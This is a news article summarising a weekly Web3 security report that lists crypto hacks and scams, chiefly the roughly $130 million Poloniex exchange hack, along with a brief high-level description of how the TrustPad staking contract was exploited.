Web3 cybersecurity firm SlowMist shared its weekly security report, covering incidents that occurred between November 5 and November 11. In total, SlowMist identified nine exploits and scams resulting in a financial loss of $138,522,643.
The most significant security incident of the past week was the hack of Poloniex, a cryptocurrency exchange that has been in operation since 2014. The attack was initially detected on November 10. Other blockchain security experts, including the CertiK team, first noticed a transfer of over $31 million from the Poloniex 4 hot wallet. Later that day, it became evident that this was just a fraction of the lost funds, which included ETH worth $33 million, TRON worth $48.7 million, and Bitcoin worth $18.6 million, bringing the total loss to nearly $100 million.
Unfortunately, according to SlowMist's update, the damage to the exchange platform was even greater, amounting to $130 million. Despite the significant impact on Poloniex, Justin Sun, from the Tron platform, asserts that the exchange's team plans to compensate its users for the hack.
"Poloniex maintains a healthy financial position and will fully reimburse the affected funds," Sun posted on X on November 10, adding that Poloniex is "exploring opportunities for collaboration with other exchanges to facilitate the recovery of these funds."
On the same day, Sun also addressed the Poloniex hacker in another X post, offering them a seven-day period to consider a 5% bug bounty proposal.
Furthermore, the team behind the Arkham platform, which links cryptocurrency activity to real users, announced that it "has created and funded a bounty to help identify the person or organization behind today's Poloniex exploit."
Among other significant incidents that occurred last week were the exploit of a contract vulnerability in the Raft protocol, leading to a loss of $3.3 million, the theft of nearly $2.152 million from MEV Robot, and the attack on CoinSpot, resulting in a loss of $2 million.
While the SlowMist report mentions the hack of TrustPad, a launchpad for gaming, DeFi, and AI projects, the team has not incorporated the losses into the statistics, as the financial damage has not been disclosed yet.
According to the cybersecurity firm Beosin, TrustPad experienced the attack on November 6. The malicious actor exploited the receiveUpPool function, which "did not verify msg.sender, allowing the attacker to manipulate newlockstartTime."
Beosin further explained that "The attacker repeatedly called receiveUpPool() and withdraw() to collect rewards, then called stakePendingRewards to convert the rewards into staking amounts." Finally, the hacker withdrew the rewards via the "withdraw()" function. According to Beosin, at least $155,000 was lost in the incident.
Other incidents mentioned in SlowMist’s report include Mirage Finance, which lost $12,000, and TheStandard, which experienced damages worth $264,000.
The most significant fraud that occurred last week was the fake Ledger Live Web3 scam, enabling malicious actors to steal $588,000. Meanwhile, the deployers of God of Wealth (GOW39) executed a rug pull, making off with $206,251.